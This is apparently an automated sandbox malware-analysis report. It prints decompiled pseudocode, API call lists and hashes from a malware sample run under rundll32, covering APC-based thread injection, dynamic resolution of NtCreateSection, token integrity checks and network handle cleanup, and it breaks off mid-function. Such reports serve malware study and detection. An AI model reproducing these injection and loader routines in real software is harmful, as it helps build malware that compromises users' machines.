						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                0x04b94b7b
                0x04b94b83
                0x04b94b87
                0x04b94b8d
                0x04b94b92
                0x04b94b97
                0x04b94b9a
                0x04b94b9d
                0x04b94ba2
                0x04b94ba3
                0x04b94ba6
                0x04b94bab
                0x04b94bb2
                0x04b94bbc
                0x04b94bbe
                0x04b94bbf
                0x04b94bc2
                0x04b94bde
                0x04b94be4
                0x04b94be8
                0x04b94c36
                0x04b94bea
                0x04b94bf7
                0x04b94c07
                0x04b94c0f
                0x04b94c21
                0x04b94c25
                0x00000000
                0x00000000
                0x04b94c11
                0x04b94c14
                0x04b94c19
                0x04b94c1b
                0x04b94c1b
                0x04b94bf9
                0x04b94bfb
                0x04b94c27
                0x04b94c28
                0x04b94c28
                0x04b94bf7
                0x04b94c3d

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53,?,?), ref: 04B94B87
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04B94B9D
                • _snwprintf.NTDLL ref: 04B94BC2
                • CreateFileMappingW.KERNELBASE(000000FF,04B9A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04B94BDE
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53,?), ref: 04B94BF0
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04B94C07
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53), ref: 04B94C28
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53,?), ref: 04B94C30
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID: @MetNet
                • API String ID: 1814172918-2109406137
                • Opcode ID: afb8dc6c0f805db62a4ea92e66da07dfbef8f994dc03e6b863b6766588eec9c8
                • Instruction ID: affb63dea77dfb5a9ec0f96ca7cdcabb199d8551c0b3c3bbf901338c03936908
                • Opcode Fuzzy Hash: afb8dc6c0f805db62a4ea92e66da07dfbef8f994dc03e6b863b6766588eec9c8
                • Instruction Fuzzy Hash: 0F2190B2604208BFDB11AB68DD05F9E77F9EB88750F214175F619E7290EA70ED058B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401026 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 311 401026-40103a 312 4010ab-4010b8 InterlockedDecrement 311->312 313 40103c-40103d 311->313 314 4010f8-4010ff 312->314 315 4010ba-4010c0 312->315 313->314 316 401043-401050 InterlockedIncrement 313->316 317 4010c2 315->317 318 4010ec-4010f2 HeapDestroy 315->318 316->314 319 401056-40105c 316->319 320 4010c7-4010d7 SleepEx 317->320 318->314 323 401063-40106a 319->323 321 4010e0-4010e6 CloseHandle 320->321 322 4010d9-4010de 320->322 321->318 322->320 322->321 324 4010a6-4010a9 323->324 325 40106c-40109d call 401a4e call 401234 323->325 324->314 325->314 330 40109f-4010a2 325->330 330->324
                C-Code - Quality: 86%
                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x404188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x40418c;
						if( *0x40418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x404198;
								if( *0x404198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x40418c);
						}
						HeapDestroy( *0x404190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x404188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x404190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x4041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E00401234(E00401108, E00401A4E(_a12, 1, 0x404198, _t41));
							 *0x40418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                0x00401029
                0x00401035
                0x00401037
                0x0040103a
                0x004010b0
                0x004010b6
                0x004010b8
                0x004010ba
                0x004010c0
                0x004010c2
                0x004010c7
                0x004010ca
                0x004010d5
                0x004010d7
                0x00000000
                0x00000000
                0x004010d9
                0x004010dc
                0x004010de
                0x00000000
                0x00000000
                0x00000000
                0x004010de
                0x004010e6
                0x004010e6
                0x004010f2
                0x004010f2
                0x0040103c
                0x0040103d
                0x0040105d
                0x00401063
                0x00401068
                0x0040106a
                0x004010a6
                0x004010a6
                0x0040106c
                0x00401074
                0x0040107b
                0x00401085
                0x00401091
                0x00401096
                0x0040109d
                0x004010a2
                0x00000000
                0x004010a2
                0x0040109d
                0x0040106a
                0x0040103d
                0x004010ff

                APIs
                • InterlockedIncrement.KERNEL32(00404188), ref: 00401048
                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0040105D
                  • Part of subcall function 00401234: CreateThread.KERNEL32 ref: 0040124B
                  • Part of subcall function 00401234: QueueUserAPC.KERNEL32(?,00000000,?), ref: 00401260
                  • Part of subcall function 00401234: GetLastError.KERNEL32(00000000), ref: 0040126B
                  • Part of subcall function 00401234: TerminateThread.KERNEL32(00000000,00000000), ref: 00401275
                  • Part of subcall function 00401234: CloseHandle.KERNEL32(00000000), ref: 0040127C
                  • Part of subcall function 00401234: SetLastError.KERNEL32(00000000), ref: 00401285
                • InterlockedDecrement.KERNEL32(00404188), ref: 004010B0
                • SleepEx.KERNEL32(00000064,00000001), ref: 004010CA
                • CloseHandle.KERNEL32 ref: 004010E6
                • HeapDestroy.KERNEL32 ref: 004010F2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                • String ID: Tet
                • API String ID: 2110400756-252227037
                • Opcode ID: 669a5a5f85ff216ecb959dfe8c96872353a21141545acfd4606ed105fff93c3f
                • Instruction ID: 9d4a17a678d08970cf57b2f1e36a9458cc50fc0a5258caeb14e27803114ead1f
                • Opcode Fuzzy Hash: 669a5a5f85ff216ecb959dfe8c96872353a21141545acfd4606ed105fff93c3f
                • Instruction Fuzzy Hash: A821DBB1601245EFC7109FA9DD8995A3BACF795361710803FF645F76E0D6388D808B5C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401234 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32threadinjectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 331 401234-401255 CreateThread 332 401257-401268 QueueUserAPC 331->332 333 40128c-40128f 331->333 332->333 334 40126a-40128b TerminateThread CloseHandle SetLastError 332->334 334->333
                C-Code - Quality: 100%
                			E00401234(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x4041c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                0x0040124b
                0x00401251
                0x00401255
                0x00401260
                0x00401268
                0x00401271
                0x00401275
                0x0040127c
                0x00401283
                0x00401285
                0x0040128b
                0x00401268
                0x0040128f

                APIs
                • CreateThread.KERNEL32 ref: 0040124B
                • QueueUserAPC.KERNEL32(?,00000000,?), ref: 00401260
                • GetLastError.KERNEL32(00000000), ref: 0040126B
                • TerminateThread.KERNEL32(00000000,00000000), ref: 00401275
                • CloseHandle.KERNEL32(00000000), ref: 0040127C
                • SetLastError.KERNEL32(00000000), ref: 00401285
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                • String ID: @Met`fet MetTet
                • API String ID: 3832013932-3757152079
                • Opcode ID: bf9b07cd72ddc2e2615db3486535b2b5d0ca531616998ebd93f4fd021cca7c02
                • Instruction ID: 1354c8c38f80fb1a657a7f50ca056ce192f000d7ace579d051b64714a3abc9de
                • Opcode Fuzzy Hash: bf9b07cd72ddc2e2615db3486535b2b5d0ca531616998ebd93f4fd021cca7c02
                • Instruction Fuzzy Hash: 90F01236506621FBD7115FA1AD08F5FBF6DFB08752F004529FA01F5174C7358A108BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B92062 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 93%
                			E04B92062(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04B9705E(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E04B94130(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E04B94130(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E04B94130(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E04B94130(_t46);
				}
				return _t24;
			}












                0x04b92062
                0x04b92062
                0x04b92064
                0x04b92066
                0x04b9206d
                0x04b92074
                0x04b92074
                0x04b92079
                0x04b9207c
                0x04b92083
                0x04b9208c
                0x04b92090
                0x04b92095
                0x04b92095
                0x04b92097
                0x04b9209c
                0x04b920a0
                0x04b920a5
                0x04b920a5
                0x04b920a7
                0x04b920ac
                0x04b920b0
                0x04b920b5
                0x04b920b5
                0x04b920b7
                0x04b920c2
                0x04b920c5
                0x04b920c5
                0x04b920c7
                0x04b920cc
                0x04b920cf
                0x04b920cf
                0x04b920d1
                0x04b920d8
                0x04b920db
                0x04b920e0
                0x04b920e3
                0x04b920e3
                0x04b920e6
                0x04b920eb
                0x04b920ee
                0x04b920ee
                0x04b920f3
                0x04b920f7
                0x04b920fa
                0x04b920fa
                0x04b920ff
                0x04b92104
                0x00000000
                0x04b92107
                0x04b9210e

                APIs
                • InternetSetStatusCallback.WININET(?,00000000), ref: 04B92090
                • InternetCloseHandle.WININET(?), ref: 04B92095
                • InternetSetStatusCallback.WININET(?,00000000), ref: 04B920A0
                • InternetCloseHandle.WININET(?), ref: 04B920A5
                • InternetSetStatusCallback.WININET(?,00000000), ref: 04B920B0
                • InternetCloseHandle.WININET(?), ref: 04B920B5
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04B94741,?,?,746981D0,00000000,00000000), ref: 04B920C5
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04B94741,?,?,746981D0,00000000,00000000), ref: 04B920CF
                  • Part of subcall function 04B9705E: WaitForMultipleObjects.KERNEL32(00000002,04B97CEC,00000000,04B97CEC,?,?,?,04B97CEC,0000EA60), ref: 04B97079
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                • String ID:
                • API String ID: 2824497044-0
                • Opcode ID: c32a9dcc3dc6f3e9a856e1664d9cc08e946e8bd038261437724b39d0d7d968e8
                • Instruction ID: b3ecd1b29b5470112b8c08966dac056003821b0b9363026afe38df539f599136
                • Opcode Fuzzy Hash: c32a9dcc3dc6f3e9a856e1664d9cc08e946e8bd038261437724b39d0d7d968e8
                • Instruction Fuzzy Hash: 0311EC76A006587BCA34AFBAEC84C5BBBEDEF453143550DA9E085D3520CB35FC958A60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B95976 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 100%
                			E04B95976(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4b9a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04B96601(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04B94130(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                0x04b95983
                0x04b9598a
                0x04b95991
                0x04b959a5
                0x04b959b0
                0x04b959c8
                0x04b959d5
                0x04b959d8
                0x04b959dd
                0x04b959e8
                0x04b959ec
                0x04b959fb
                0x04b959ff
                0x04b95a1b
                0x04b95a1b
                0x04b95a1f
                0x04b95a1f
                0x04b95a24
                0x04b95a28
                0x04b95a2e
                0x04b95a2f
                0x04b95a36
                0x04b95a3c

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04B959A8
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04B959C8
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04B959D8
                • CloseHandle.KERNEL32(00000000), ref: 04B95A28
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04B959FB
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04B95A03
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04B95A13
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: dce305b98602624abbf47764ce9769091c88518d6cfadec302a352f94d3fe8bc
                • Instruction ID: beb21443cb4d8cacf9f39a19520fbeb5a25267e847beba085327b63a93fe1a89
                • Opcode Fuzzy Hash: dce305b98602624abbf47764ce9769091c88518d6cfadec302a352f94d3fe8bc
                • Instruction Fuzzy Hash: 6421487590025DBFEF119FA0DD84EEEBBB9EB08304F1000A6E910A62A0CB755E55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B95D8A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E04B95D8A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4b9a348; // 0x56d5a8
				_t1 = _t9 + 0x4b9b624; // 0x253d7325
				_t36 = 0;
				_t28 = E04B94A01(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5109601
					_t40 = E04B96601(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E04B95310(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E04B94130(_t40);
						_t42 = E04B9272B(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04B94130(_t36);
							_t36 = _t42;
						}
						_t43 = E04B92273(_t36, _t33);
						if(_t43 != 0) {
							E04B94130(_t36);
							_t36 = _t43;
						}
					}
					E04B94130(_t28);
				}
				return _t36;
			}
















                0x04b95d8a
                0x04b95d8d
                0x04b95d8e
                0x04b95d95
                0x04b95d9c
                0x04b95da3
                0x04b95da7
                0x04b95dae
                0x04b95db5
                0x04b95dba
                0x04b95dc2
                0x04b95dcc
                0x04b95dd0
                0x04b95dd4
                0x04b95dda
                0x04b95ddf
                0x04b95de9
                0x04b95def
                0x04b95df1
                0x04b95e08
                0x04b95e0c
                0x04b95e0f
                0x04b95e14
                0x04b95e14
                0x04b95e1d
                0x04b95e21
                0x04b95e24
                0x04b95e29
                0x04b95e29
                0x04b95e21
                0x04b95e2c
                0x04b95e31
                0x04b95e37

                APIs
                  • Part of subcall function 04B94A01: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04B95DA3,253D7325,00000000,00000000,?,76B5C740,04B96DDD), ref: 04B94A68
                  • Part of subcall function 04B94A01: sprintf.NTDLL ref: 04B94A89
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DB5
                • lstrlen.KERNEL32(00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DBD
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • strcpy.NTDLL ref: 04B95DD4
                • lstrcat.KERNEL32(00000000,00000000), ref: 04B95DDF
                  • Part of subcall function 04B95310: lstrlen.KERNEL32(00000000,00000000,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95321
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DFC
                  • Part of subcall function 04B9272B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04B95E08,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B92735
                  • Part of subcall function 04B9272B: _snprintf.NTDLL ref: 04B92793
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: 95fb52e9a080b6b675d8a8586efb40b815d45d4cdbc9e025bfeb3436b0998b09
                • Instruction ID: 5a131ff33c400e9a4f292e9a139d13a10594aeb7c243bedafb4ff4b06e0ab893
                • Opcode Fuzzy Hash: 95fb52e9a080b6b675d8a8586efb40b815d45d4cdbc9e025bfeb3436b0998b09
                • Instruction Fuzzy Hash: B2119133905535775E2277B4AC44CAF3ADDDE4965870544B6F500A7200DE79FD0247A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401AA8 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401AA8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00401634(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x4041c4 + 0x405014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x4041c4 + 0x405151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401B8C(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x4041c4 + 0x405161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x4041c4 + 0x405174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x4041c4 + 0x405189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x4041c4 + 0x40519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040154A(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                0x00401ab6
                0x00401aba
                0x00401b7b
                0x00401ac0
                0x00401ad8
                0x00401ae7
                0x00401aee
                0x00401af0
                0x00401af5
                0x00401b73
                0x00401b74
                0x00401af7
                0x00401b04
                0x00401b06
                0x00401b0b
                0x00000000
                0x00401b0d
                0x00401b1a
                0x00401b1c
                0x00401b21
                0x00000000
                0x00401b23
                0x00401b30
                0x00401b32
                0x00401b37
                0x00000000
                0x00401b39
                0x00401b46
                0x00401b48
                0x00401b4d
                0x00000000
                0x00401b4f
                0x00401b55
                0x00401b5b
                0x00401b60
                0x00401b65
                0x00401b6a
                0x00000000
                0x00401b6c
                0x00401b6f
                0x00401b6f
                0x00401b6a
                0x00401b4d
                0x00401b37
                0x00401b21
                0x00401b0b
                0x00401af5
                0x00401b89

                APIs
                  • Part of subcall function 00401634: RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401961,?,?,?,?,?,00000002,?,?), ref: 00401ACC
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401AEE
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B04
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B1A
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B30
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401B46
                  • Part of subcall function 0040154A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 004015A7
                  • Part of subcall function 0040154A: memset.NTDLL ref: 004015C9
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: d98a950e50a03993abc413ac9c6a8d83a4e28b3843b188da81eabab51976a571
                • Instruction ID: 104c0fa8a799cd8d8f99161a68f82bfdf39da6e094ed46ae4b7535b7f7f06d6b
                • Opcode Fuzzy Hash: d98a950e50a03993abc413ac9c6a8d83a4e28b3843b188da81eabab51976a571
                • Instruction Fuzzy Hash: B12127B0A0460AAFD710DF69CD84E6BB7FCEB4434470044B6E909EB2B1E774E9058B68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B963F7 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B963F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
